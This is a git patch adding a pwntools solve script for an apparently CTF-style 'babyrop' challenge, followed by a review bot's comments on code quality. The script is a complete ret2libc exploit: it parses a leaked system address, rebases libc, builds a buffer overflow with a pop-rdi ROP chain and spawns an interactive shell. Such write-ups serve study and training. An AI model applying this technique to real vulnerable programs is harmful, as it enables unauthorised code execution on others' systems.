From 7722ca5a213ac183b1e03aa3a680fd589e42526c Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 6 Aug 2025 19:13:20 +0300
Subject: [PATCH] solve script
---
weiss_overlude/babyrop_level_7.1/a.py | 31 +++++++++++++++++++++++++++
1 file changed, 31 insertions(+)
create mode 100644 weiss_overlude/babyrop_level_7.1/a.py
diff --git a/weiss_overlude/babyrop_level_7.1/a.py b/weiss_overlude/babyrop_level_7.1/a.py
new file mode 100644
index 0000000..6782afa
--- /dev/null
+++ b/weiss_overlude/babyrop_level_7.1/a.py
@@ -0,0 +1,31 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_7_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x401ec3
+
+# buf
+r.recvuntil(b"[LEAK]")
+system = int(re.findall(r'0x[a-z0-9]+', r.recvlineS())[0], 16)
+log.info("system: %#x", system)
+libc.address = system - libc.sym.system
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+
+# pop
+buf = b"A"*104
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file
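Review bot: The leak parsing on the `system = int(re.findall(...)[0], 16)` line relies on `re` arriving through `from pwn import *`, and its character class `[a-z0-9]` is wider than hexadecimal; if the line following `[LEAK]` contains no match, the `[0]` raises a bare IndexError with no hint of what went wrong. I would add an explicit `import re`, tighten the pattern to `r'0x[0-9a-f]+'`, and raise a clear error when nothing matches. Separately, `0x401ec3`, `104` and `pop_rdi+1` are tied to one build of `babyrop_level_7_1` and carry no explanation; a comment such as `# constants valid only for this build; pop_rdi+1 appears to be used as a bare ret` would tell a reader why the script stops working once the binary is rebuilt. The `checksec=False` argument also suppresses the mitigation summary, so a short comment recording which protections the binary was built with would make the write-up more useful for study.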